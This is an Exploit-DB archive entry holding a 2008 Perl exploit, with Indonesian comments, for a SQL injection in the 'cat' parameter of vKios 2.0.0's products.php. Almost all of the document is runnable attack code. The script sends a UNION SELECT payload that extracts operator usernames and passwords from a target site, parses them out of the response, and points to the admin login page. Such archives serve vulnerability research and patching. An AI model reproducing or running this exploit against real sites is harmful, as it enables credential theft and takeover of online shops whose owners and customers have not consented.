vKios 2.0.0 - 'cat' SQL Injection

EDB-ID:

5101

CVE:

N/A




Platform:

PHP

Date:

2008-02-12


#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# vKios <= 2.0.0  (products.php cat) Remote SQL Injection Exploit
# Waktu		:  Feb 8 2008 10:00PM
# Software	:  vKios  
# Versi		:  <= 2.0.0
# Vendor 	:  http://www.vkios.com/
#
# ------------------------------------
# Audit Oleh 	:  NTOS-Team
# Lokasi	:  Indonesia | http://newhack.org
# Penjelasan	:
# 
# vKios adalah aplikasi CMS untuk membangun website toko online dalam sekejap
# variabel "cat" pada berkas "products.php" tidak tersaring dengan sempurna
# sehingga pengunjung site dapat memanipulasi pernyataan SQL melalui URL secara Remote
# Contoh ;
# http://site.korban/products.php?cat=[SQLI]   
#
# -------------------------------------
# Exploit ini dibuat untuk pembelajaran, pengetesan dan pembuktian dari apa yang kami pelajari,
# Indonesian Newhack Technology tidak bertanggung jawab akan kerusakan 
# yang diakibatkan dari penyalahgunaan exploit oleh pihak lain  
#
# => NTOS-Team->[fl3xu5,k1tk4t,opt1lc]
# 
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[2])
{
 print "\n  |-------------------------------------------------------|";
 print "\n  |            Indonesian Newhack Technology              |";
 print "\n  |-------------------------------------------------------|";
 print "\n  | vKios (products.php cat) Remote SQL Injection Exploit |";
 print "\n  |                Coded by NTOS-Team                     |";
 print "\n  |-------------------------------------------------------|";
 print "\n[!] ";
 print "\n[!] Penggunaan : perl vkios.pl [Site] [Path] [Option]";
 print "\n[!] [Option] 2 = versi > 1.3  |  1 = versi < 1.3 ";
 print "\n[!] Contoh     : perl vkios.pl localhost /vkios/ -o 1";
 print "\n[!] ";
 print "\n";
 exit;
}
$site = $ARGV[0]; # Site Target
$path = $ARGV[1]; # Path direktori vKios
%options = ();
GetOptions(\%options, "o=i",);
if($options{"o"} && $options{"o"} == 1) { $injek = "http://".$site.$path."products.php?cat=-1%20union%20select%201,concat(0x74346d7520,username,0x3a,password,0x2067656c3470),3,4,5,6,7,8,9%20from%20operator"; }
if($options{"o"} && $options{"o"} == 2) { $injek = "http://".$site.$path."products.php?cat=-1%20union%20select%201,concat(0x74346d7520,username,0x3a,password,0x2067656c3470),3,4,5,6,7,8,9,10%20from%20operator"; }

$www = new LWP::UserAgent;
$sql = $injek;
print "\n\n [Konek] Injeksi SQL \n";
$res = $www -> get($sql) or err();
$res -> content() =~ /t4mu (.*?) gel4p/ or err();
print "\n [Info.] username:password";
print "\n [Hasil] $1 \n";
print "\n [Login] http://".$site.$path."admin/ \n\n";

sub err()
{
print "\n [-] Exploit gagal :( - cari yang lain!";
exit();
}

# milw0rm.com [2008-02-12]